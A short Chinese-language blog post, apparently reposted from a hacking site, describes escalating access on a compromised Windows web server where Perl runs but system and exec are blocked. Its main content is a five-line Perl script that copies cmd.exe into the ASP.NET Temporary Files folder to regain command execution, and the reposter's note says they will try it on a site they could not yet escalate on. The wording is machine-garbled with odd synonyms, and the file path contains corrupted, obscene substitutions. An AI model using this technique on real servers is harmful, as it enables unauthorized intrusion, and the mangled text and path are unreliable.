利用PERL突破目录无执行权限

老鸟飞过。
进入正题.

目的可写目录无履行权限.装有PERL。有运转权限。但system,exec,,这几个函数不有权限。

留神PERL并不是系统权限。而是继承的nt authoritynetwork service权限，以是默认比网站权限略的高点。

把持perl的copy 函数

1. use File::Copy;
2. $a=’d:网站cmd.exe’;
3. $ac=’c:/windows/Microsoft.NET/Framework/v2.0.50727/Temporary ASP.NET Files/root/奸淫*奸淫/奸淫*奸淫*/hash/cmd.exe’;
4. copy($a, $ac) or die “Copy failed: $!”;
5. print ‘ok’;
6. 

91ri.org:小编手上有个站提了良久没提下，看到此文章想起早年的站上的环境，目测也许用此法子法度模范试试 分享一下 做个参考吧 等于有定然领域性 呵呵 闪 提权去。

若是列位手上另有啥站提不下 正纠结着 也许参考我们网站的提权版块 也许会有引导哟！ 点此进入：提权

转自http://hi.baidu.com/nfxwjevarpcklrr/item/9a1c3330af5e00f496f88dc0

由网络安全攻防研究室(www.91ri.org)音讯安全小组搜集整顿。